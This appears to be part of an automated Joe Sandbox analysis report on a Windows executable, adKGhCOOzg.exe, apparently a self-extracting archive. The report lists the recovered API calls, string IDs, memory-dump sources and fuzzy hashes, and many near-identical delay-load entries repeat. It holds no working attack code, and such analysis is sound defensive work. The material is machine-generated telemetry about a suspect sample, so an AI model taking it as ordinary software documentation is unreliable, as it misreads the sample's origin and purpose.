                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035AC85
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035AC96
                                    • IsDialogMessageW.USER32(00010420,?), ref: 0035ACAA
                                    • TranslateMessage.USER32(?), ref: 0035ACB8
                                    • DispatchMessageW.USER32(?), ref: 0035ACC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Similarity
                                    • API ID: Message$DialogDispatchPeekTranslate
                                    • String ID:
                                    • API String ID: 1266772231-0

                                    Control-flow Graph

                                    APIs
                                    • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\adKGhCOOzg.exe,00000104), ref: 003676FD
                                    • _free.LIBCMT ref: 003677C8
                                    • _free.LIBCMT ref: 003677D2
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\Desktop\adKGhCOOzg.exe
                                    • API String ID: 2506810119-3508314198

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00350085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                      • Part of subcall function 00350085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    • OleInitialize.OLE32(00000000), ref: 0035A34E
                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0035A385
                                    • SHGetMalloc.SHELL32(00388430), ref: 0035A38F
                                    Similarity
                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                    • String ID: riched20.dll
                                    • API String ID: 3498096277-3360196438

                                    Control-flow Graph

                                    APIs
                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0035D29D
                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0035D2D9
                                    Similarity
                                    • API ID: EnvironmentVariable
                                    • String ID: sfxcmd$sfxpar
                                    • API String ID: 1431749950-3493335439
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 0034985E
                                    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00349876
                                    • GetLastError.KERNEL32 ref: 003498A8
                                    • GetLastError.KERNEL32 ref: 003498C7
                                    Similarity
                                    • API ID: ErrorLast$FileHandleRead
                                    • String ID:
                                    • API String ID: 2244327787-0
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0034CFE0,00000000,00000000,?,0036A49B,0034CFE0,00000000,00000000,00000000,?,0036A698,00000006,FlsSetValue), ref: 0036A526
                                    • GetLastError.KERNEL32(?,0036A49B,0034CFE0,00000000,00000000,00000000,?,0036A698,00000006,FlsSetValue,00377348,00377350,00000000,00000364,?,00369077), ref: 0036A532
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036A49B,0034CFE0,00000000,00000000,00000000,?,0036A698,00000006,FlsSetValue,00377348,00377350,00000000), ref: 0036A540
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    APIs
                                      • Part of subcall function 00368FA5: GetLastError.KERNEL32(?,00380EE8,00363E14,00380EE8,?,?,00363713,00000050,?,00380EE8,00000200), ref: 00368FA9
                                      • Part of subcall function 00368FA5: _free.LIBCMT ref: 00368FDC
                                      • Part of subcall function 00368FA5: SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 0036901D
                                      • Part of subcall function 00368FA5: _abort.LIBCMT ref: 00369023
                                      • Part of subcall function 0036B2AE: _abort.LIBCMT ref: 0036B2E0
                                      • Part of subcall function 0036B2AE: _free.LIBCMT ref: 0036B314
                                      • Part of subcall function 0036AF1B: GetOEMCP.KERNEL32(00000000,?,?,0036B1A5,?), ref: 0036AF46
                                    • _free.LIBCMT ref: 0036B200
                                    • _free.LIBCMT ref: 0036B236
                                    Similarity
                                    • API ID: _free$ErrorLast_abort
                                    • String ID: 7
                                    • API String ID: 2991157371-2922071456
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0034CC94,00000001,?,?,?,00000000,00354ECD,?,?,?), ref: 00349F4C
                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00354ECD,?,?,?,?,?,00354972,?), ref: 00349F8E
                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0034CC94,00000001,?,?), ref: 00349FB8
                                    Similarity
                                    • API ID: FileWrite$Handle
                                    • String ID:
                                    • API String ID: 4209713984-0
                                    APIs
                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A22E
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A261
                                    • GetLastError.KERNEL32(?,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A27E
                                    Similarity
                                    • API ID: CreateDirectory$ErrorLast
                                    • String ID:
                                    • API String ID: 2485089472-0
                                    APIs
                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0036B019
                                    Similarity
                                    • API ID: Info
                                    • String ID:
                                    • API String ID: 1807457897-3916222277
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0036A79D
                                    Similarity
                                    • API ID: String
                                    • String ID: LCMapStringEx
                                    • API String ID: 2568140703-3893581201
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00369D2F), ref: 0036A715
                                    Strings
                                    • InitializeCriticalSectionEx, xrefs: 0036A6E5
                                    Similarity
                                    • API ID: CountCriticalInitializeSectionSpin
                                    • String ID: InitializeCriticalSectionEx
                                    • API String ID: 2593887523-3084827643
                                    APIs
                                    Similarity
                                    • API ID: Alloc
                                    • String ID: FlsAlloc
                                    • API String ID: 2773662609-671089009
                                    • Opcode ID: 14cca8709b1a6cde37590a548da3ac0c85fa36c2d0a834f7df15c7ea6698c6c7
                                    • Instruction ID: fefdd97acb02ad2b67a6830d719502a51d126b5f74516ec1ef2cf21cbef52a65
                                    • Opcode Fuzzy Hash: 14cca8709b1a6cde37590a548da3ac0c85fa36c2d0a834f7df15c7ea6698c6c7
                                    • Instruction Fuzzy Hash: 2EE05C30745218AB9237AB50CC01DADBB58CB19711F418054FC0D2B240CD744E00A6D6
                                    APIs
                                    • try_get_function.LIBVCRUNTIME ref: 003632AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: try_get_function
                                    • String ID: FlsAlloc
                                    • API String ID: 2742660187-671089009
                                    • Opcode ID: e114d7cae847d3b7dfb77fe0111f8be96750914728bbab651066642295f62011
                                    • Instruction ID: 958f08d60b91167961c31911711e0e01220cefd97cc2da42d77b8b4c4c050626
                                    • Opcode Fuzzy Hash: e114d7cae847d3b7dfb77fe0111f8be96750914728bbab651066642295f62011
                                    • Instruction Fuzzy Hash: E1D02B21B807346A813732C06C039EE7E048702FB2F458152FE0C2E14284E5964061C5
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 539d041dd125146a0dc012634216d94da5e579942841bdd402f34a3a17f34a9e
                                    • Instruction ID: 53dcc5c9aab6a74851fc1b63def62c377a17ccee674d8a937234f5e20ea4c1b8
                                    • Opcode Fuzzy Hash: 539d041dd125146a0dc012634216d94da5e579942841bdd402f34a3a17f34a9e
                                    • Instruction Fuzzy Hash: 1FB0129526C001AD313B6608AC06E37036CC4C2B13330C01AFC0ED42D0D4405C0E0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 7fb9d35a745b6cbbf7ef0a31d7559b1030f2f704e13daaa7cf19a75d4d617dc0
                                    • Instruction ID: d4e1395dbd1bcb9858404f62a86d5d2fb095aefab3831833dd2514aff03e41a9
                                    • Opcode Fuzzy Hash: 7fb9d35a745b6cbbf7ef0a31d7559b1030f2f704e13daaa7cf19a75d4d617dc0
                                    • Instruction Fuzzy Hash: 0AB0129926C101AD313B6208AC46E3B026CD4C1B13330801AF80ED44D0D4445C0C0931
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: decf2fca35a973b36bf1d453dad46a8b46904457f9bad01cf93c0d41352c797d
                                    • Instruction ID: 4f75c22a5eedc549b865de3b6a19252f19b0aac7b86c715667dd2606a332631a
                                    • Opcode Fuzzy Hash: decf2fca35a973b36bf1d453dad46a8b46904457f9bad01cf93c0d41352c797d
                                    • Instruction Fuzzy Hash: A2B0129926C301BD313B2204AC56D3B022CC4C1B13330852AF80EE40E0D5445C4C4831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 7cddb39596c61793d40669c28c83d15a69bb2399b9bc287a796b1b8c4bf16057
                                    • Instruction ID: f19c82965ff82acc0ce17b8ddec91198151670fa8900fb3221a6152fb09ee78e
                                    • Opcode Fuzzy Hash: 7cddb39596c61793d40669c28c83d15a69bb2399b9bc287a796b1b8c4bf16057
                                    • Instruction Fuzzy Hash: 4AB012E536C001AD313F6208AD06E37026CC4C1B13330801AFC0FD40E0D4405D0D0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 79bcdb4f4879e9fbbcabb7cef5f6f53bf7d5f4129f2c03e88659a0f8f9abb3be
                                    • Instruction ID: 4fb2e1ed651d3cb66e77f8f9c7f1c441bae88d5d20aaeb5cf5347b892c633381
                                    • Opcode Fuzzy Hash: 79bcdb4f4879e9fbbcabb7cef5f6f53bf7d5f4129f2c03e88659a0f8f9abb3be
                                    • Instruction Fuzzy Hash: 38B012E526C001AD313F6209AC06E37026CC4C1B13330801AF80ED44E0D4405C0C0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 3222f9d9956792c9f0b5b115410bbdcbf5ba47ecae974c0cc8aff00fbc5a7835
                                    • Instruction ID: 9bbd14eadb0f1de9df5da5155f56097081a44247280f068ba1aeddb754795763
                                    • Opcode Fuzzy Hash: 3222f9d9956792c9f0b5b115410bbdcbf5ba47ecae974c0cc8aff00fbc5a7835
                                    • Instruction Fuzzy Hash: 53B012E526C101AD317B6208AC06E37026CC4C1B13330811AF80ED40E0D4405C4C0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 73b95d5b8723849e41b111a98057340d6142efaee42f390b8179930d6800d870
                                    • Instruction ID: 5d2da604c36bcb44c4b46f2ef53a4311c0c95e210e5d66124ba1b99ceacb1ad7
                                    • Opcode Fuzzy Hash: 73b95d5b8723849e41b111a98057340d6142efaee42f390b8179930d6800d870
                                    • Instruction Fuzzy Hash: 10B012E526C001AD313B6208AC06E37026CC4C2B13330C01AFC0ED40E0D4405C0D0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 26acc380fe1bcd9f4cfa30939b98b78b84b272e786daafc8671814f43593e032
                                    • Instruction ID: 89a011079d1646777628db2bd5f6545d21f194936e8e020fdb45d950c2f18aeb
                                    • Opcode Fuzzy Hash: 26acc380fe1bcd9f4cfa30939b98b78b84b272e786daafc8671814f43593e032
                                    • Instruction Fuzzy Hash: EEB0129526C141AD317B6208AC06E37036CC4C1B13330C11AF80ED42D0D4405C8D0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 9eeba0be5dc406899831dcfc987297efa21555af4a23a8a619e7cbfee9a031d3
                                    • Instruction ID: 4f9ea29f971ad0650d52b5dde62dfbdd598c91c33b8c208dcbda7d6370aa710d
                                    • Opcode Fuzzy Hash: 9eeba0be5dc406899831dcfc987297efa21555af4a23a8a619e7cbfee9a031d3
                                    • Instruction Fuzzy Hash: DCB012953AC001AD313F6608AD06E37036CC4C1B13330C01AFC0ED42D0D4405C0E0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: d5241d67806f134d159cc54459ac765a743aff3aa5bf71c33c2fcd347ebdd981
                                    • Instruction ID: c616184dde5a544bc07f1e9e08661dc5e340e2569f4795e57314f40c4b0b7cc5
                                    • Opcode Fuzzy Hash: d5241d67806f134d159cc54459ac765a743aff3aa5bf71c33c2fcd347ebdd981
                                    • Instruction Fuzzy Hash: EBB0129527D001AD317B6308AC06E3702AEC8C1B13330801AF80ED44D0D4405C0C0831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 48d3b35c884045a43d87c541a064734ef50a78379b87e53dd445658dda7d2b72
                                    • Instruction ID: 71a59d8043ca26a95383432d29f69d51048f965d8fa274d269a677a0dab4d556
                                    • Opcode Fuzzy Hash: 48d3b35c884045a43d87c541a064734ef50a78379b87e53dd445658dda7d2b72
                                    • Instruction Fuzzy Hash: 3DB0129526C001AD313F6218AC06E3702ACC4C2B13330C02AFD0ED40D0D5405C0D0931
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    APIs
                                      • Part of subcall function 0036AF1B: GetOEMCP.KERNEL32(00000000,?,?,0036B1A5,?), ref: 0036AF46
